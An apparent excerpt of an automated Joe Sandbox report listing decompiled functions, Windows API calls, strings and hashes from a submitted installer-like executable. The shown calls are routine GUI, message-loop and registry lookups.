                                                                                            • Opcode ID: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                            • Instruction ID: bc3149483dfa03cdc0807f0a56c3f90cc05caec19bb46b1e0c32919a2f580dbf
                                                                                            • Opcode Fuzzy Hash: 57ccdcba8889ff27764a16026ea30ef1297fbdf3a800011468703812a277a737
                                                                                            • Instruction Fuzzy Hash: 95512674A00144ABDB00EF6ADC816EA7BF9AF09304B11817BFA04E73A6D738C941CB5C
                                                                                            APIs
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF38
                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 0041BF47
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BF98
                                                                                            • GetBitmapBits.GDI32(?,?,?), ref: 0041BFA6
                                                                                            • DeleteObject.GDI32(?), ref: 0041BFAF
                                                                                            • DeleteObject.GDI32(?), ref: 0041BFB8
                                                                                            • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFD5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                            • String ID:
                                                                                            • API String ID: 1030595962-0
                                                                                            • Opcode ID: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                            • Instruction ID: b628a60b6e344882d317dd96d191c0cb792f95d1e2fbfe9e34044ce63643746d
                                                                                            • Opcode Fuzzy Hash: c1e7ff30722f84a59b7c576368abad4b11806281d6eddf659bf093bc56a2286c
                                                                                            • Instruction Fuzzy Hash: 48510571E00219AFCB14DFA9C8819EEBBF9EF48314B11442AF914E7391D738AD81CB64
                                                                                            APIs
                                                                                            • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CF0E
                                                                                            • 73A14620.GDI32(00000000,00000026), ref: 0041CF2D
                                                                                            • 73A08830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF93
                                                                                            • 73A022A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CFA2
                                                                                            • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D00C
                                                                                            • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D04A
                                                                                            • 73A08830.GDI32(?,?,00000001,0041D07C,00000000,00000026), ref: 0041D06F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Stretch$A08830$A022A14620BitsMode
                                                                                            • String ID:
                                                                                            • API String ID: 2733548868-0
                                                                                            • Opcode ID: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                            • Instruction ID: 415929d19c0355200a34ec50ec85ee50bdb26205500aadc12dd1df5ccaef5bc8
                                                                                            • Opcode Fuzzy Hash: d1728d26c473023a034cda29587c75d8a44e61feb8d5ac31eb3562e546440a0c
                                                                                            • Instruction Fuzzy Hash: 7A514EB0604200AFD714DFA9C995F9BBBF9EF08304F10859AB549DB292C779ED81CB58
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,?,?), ref: 00456526
                                                                                              • Part of subcall function 0042428C: GetWindowTextA.USER32(?,?,00000100), ref: 004242AC
                                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                              • Part of subcall function 0041EEB4: 73A15940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                              • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0045658D
                                                                                            • TranslateMessage.USER32(?), ref: 004565AB
                                                                                            • DispatchMessageA.USER32(?), ref: 004565B4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                                            • String ID: [Paused]
                                                                                            • API String ID: 1715372110-4230553315
                                                                                            • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                            • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                                            • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                                            • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                                            APIs
                                                                                            • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                                            • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                                            • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                                            • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Cursor$LoadSleep
                                                                                            • String ID: CheckPassword
                                                                                            • API String ID: 4023313301-1302249611
                                                                                            • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                            • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                                            • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                                            • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                                            APIs
                                                                                              • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                              • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                              • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                                            • GetTickCount.KERNEL32 ref: 0047678E
                                                                                            • GetTickCount.KERNEL32 ref: 00476798
                                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                                            Strings
                                                                                            • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                                            • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                                            • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                                            • API String ID: 613034392-3771334282
                                                                                            • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                            • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                                            • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                                            • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                                            APIs
                                                                                            • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                                            Strings
                                                                                            • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                                            • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                                            • CreateAssemblyCache, xrefs: 00458F56
                                                                                            • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                                            • Fusion.dll, xrefs: 00458EFF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc
                                                                                            • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                                            • API String ID: 190572456-3990135632
                                                                                            • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                            • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                                            • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                                            • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                                            APIs
                                                                                              • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                                            • GetFocus.USER32 ref: 0041C178
                                                                                            • 73A0A570.USER32(?), ref: 0041C184
                                                                                            • 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                                            • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                                            • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                                            • 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                                            • 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A08830$A022A480A570BitsFocusObject
                                                                                            • String ID:
                                                                                            • API String ID: 1424713005-0
                                                                                            • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                            • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                                            • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                                            • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                            • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                              • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                            • 6F58CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                            • 6F58C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                            • 6F58CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                            • 6F520860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$C400C740F520860F522980
                                                                                            • String ID:
                                                                                            • API String ID: 2856677924-0
                                                                                            • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                            • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                                            • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                                            • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                                            APIs
                                                                                              • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpen
                                                                                            • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                            • API String ID: 47109696-2530820420
                                                                                            • Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                                            • Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
                                                                                            • Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                                            • Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                                            APIs
                                                                                            • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                            • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                            • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                            • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ObjectSelect$Delete$Stretch
                                                                                            • String ID:
                                                                                            • API String ID: 1458357782-0
                                                                                            • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                            • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                                            • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                                            • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                                            APIs
                                                                                            • 73A0A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                                              • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                                            • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
                                                                                            • 73A0A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                                            Strings
                                                                                            • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                            • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                            • API String ID: 1435929781-222967699
                                                                                            • Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                                            • Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
                                                                                            • Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                                            • Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
                                                                                            APIs
                                                                                            • GetCursorPos.USER32 ref: 004233BF
                                                                                            • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                            • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                            • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                            • SetCursor.USER32(00000000), ref: 00423423
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                            • String ID:
                                                                                            • API String ID: 1770779139-0
                                                                                            • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                            • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                            • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                            • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                                            • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                                            • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModule
                                                                                            • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                            • API String ID: 667068680-2254406584
                                                                                            • Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                                            • Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
                                                                                            • Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                                            • Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
                                                                                            APIs
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                                            • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
                                                                                            • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
